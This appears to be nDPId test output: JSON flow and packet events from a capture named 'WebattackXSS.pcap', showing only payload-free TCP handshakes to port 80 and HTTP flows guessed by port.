+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347594595,"flow_last_seen":1499347599780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6289,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347721376,"flow_last_seen":1499347721376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347721376,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6289,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1499347721376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347721376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UaNAAD4GdC2sEAABwKgKMutKAFCqmpZXAAAAAKACchBpRwAAAgQFtAQCCAoBO8f0AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":2,"flow_last_seen":1499347721376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347721376,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ60r+f8PRqpqWWKAScSAKhgAAAgQFtAQCCAoD5ZlpATvH9AEDAwc="} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":3,"flow_last_seen":1499347721376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347721376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UaRAAD4GdDSsEAABwKgKMutKAFCqmpZY\/n\/D0oAQAOWpjQAAAQEICgE7x\/QD5Zlp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347724082,"flow_last_seen":1499347724082,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347724082,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1499347724082,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347724082,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Pn9AAD4Gh1GsEAABwKgKMutkAFAGCvTmAAAAAKACchCsiQAAAgQFtAQCCAoBO8qZAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6312,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":2,"flow_last_seen":1499347724082,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347724082,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ62S3KtySBgr056AScSB5twAAAgQFtAQCCAoD5ZwOATvKmQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6313,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":3,"flow_last_seen":1499347724083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347724083,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PoBAAD4Gh1isEAABwKgKMutkAFAGCvTntyrck4AQAOUYvwAAAQEICgE7ypkD5ZwO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347725355,"flow_last_seen":1499347725355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347725355,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1499347725355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347725355,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jaBAAD4GODCsEAABwKgKMutyAFBT4UZ3AAAAAKACchAL1gAAAgQFtAQCCAoBO8vXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":2,"flow_last_seen":1499347725356,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347725356,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ63J14+58U+FGeKAScSAHIwAAAgQFtAQCCAoD5Z1MATvL1wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6322,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":3,"flow_last_seen":1499347725356,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347725356,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jaFAAD4GODesEAABwKgKMutyAFBT4UZ4dePufYAQAOWmKgAAAQEICgE7y9cD5Z1M"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6333,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347726623,"flow_last_seen":1499347726623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347726623,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6333,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1499347726623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347726623,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cctAAD4GVAWsEAABwKgKMuuAAFD+ZrzfAAAAAKACchDpnAAAAgQFtAQCCAoBO80UAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6334,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":2,"flow_last_seen":1499347726623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347726623,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ64DDQROl\/ma84KAScSBxJgAAAgQFtAQCCAoD5Z6JATvNFAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":3,"flow_last_seen":1499347726624,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347726624,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ccxAAD4GVAysEAABwKgKMuuAAFD+Zrzgw0ETpoAQAOUQLgAAAQEICgE7zRQD5Z6J"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347729211,"flow_last_seen":1499347729211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347729211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1499347729211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347729211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NhFAAD4Gj7+sEAABwKgKMuuaAFCuIPmKAAAAAKACchD6lgAAAgQFtAQCCAoBO8+bAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":2,"flow_last_seen":1499347729211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347729211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ65plKrngriD5i6AScSA3dQAAAgQFtAQCCAoD5aEQATvPmwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":3,"flow_last_seen":1499347729212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347729212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NhJAAD4Gj8asEAABwKgKMuuaAFCuIPmLZSq54YAQAOXWfAAAAQEICgE7z5sD5aEQ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347730501,"flow_last_seen":1499347730501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730501,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1499347730501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347730501,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83upAAD4G5uWsEAABwKgKMuuoAFBoeQ40AAAAAKACchAqRAAAAgQFtAQCCAoBO9DeAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6364,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":2,"flow_last_seen":1499347730501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347730501,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ66jFwizsaHkONaAScSCSPAAAAgQFtAQCCAoD5aJSATvQ3gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":3,"flow_last_seen":1499347730502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347730502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03utAAD4G5uysEAABwKgKMuuoAFBoeQ41xcIs7YAQAOUxRAAAAQEICgE70N4D5aJS"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347602223,"flow_last_seen":1499347607783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347602223,"flow_last_seen":1499347607783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347603507,"flow_last_seen":1499347608786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347603507,"flow_last_seen":1499347608786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347604752,"flow_last_seen":1499347609784,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347604752,"flow_last_seen":1499347609784,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347597121,"flow_last_seen":1499347602781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347597121,"flow_last_seen":1499347602781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347598383,"flow_last_seen":1499347603782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347598383,"flow_last_seen":1499347603782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347599663,"flow_last_seen":1499347604783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347599663,"flow_last_seen":1499347604783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347731797,"flow_last_seen":1499347731797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347731797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1499347731797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347731797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84K9AAD4G5SCsEAABwKgKMuu2AFCGTjKNAAAAAKACchDmwwAAAgQFtAQCCAoBO9IiAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":2,"flow_last_seen":1499347731797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347731797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ67ZFR3+Dhk4yjqAScSB7XAAAAgQFtAQCCAoD5aOWATvSIgEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6377,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":3,"flow_last_seen":1499347731798,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347731798,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04LBAAD4G5SesEAABwKgKMuu2AFCGTjKORUd\/hIAQAOUaZAAAAQEICgE70iID5aOW"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347733083,"flow_last_seen":1499347733083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347733083,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1499347733083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347733083,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/vJAAD4Gxt2sEAABwKgKMuvEAFCmnS2RAAAAAKACchDKIQAAAgQFtAQCCAoBO9NjAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":2,"flow_last_seen":1499347733083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347733083,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ68TrnH4qpp0tkqAScSC4ewAAAgQFtAQCCAoD5aTYATvTYwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6389,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":3,"flow_last_seen":1499347733084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347733084,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/vNAAD4GxuSsEAABwKgKMuvEAFCmnS2S65x+K4AQAOVXgwAAAQEICgE702MD5aTY"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347734348,"flow_last_seen":1499347734348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347734348,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
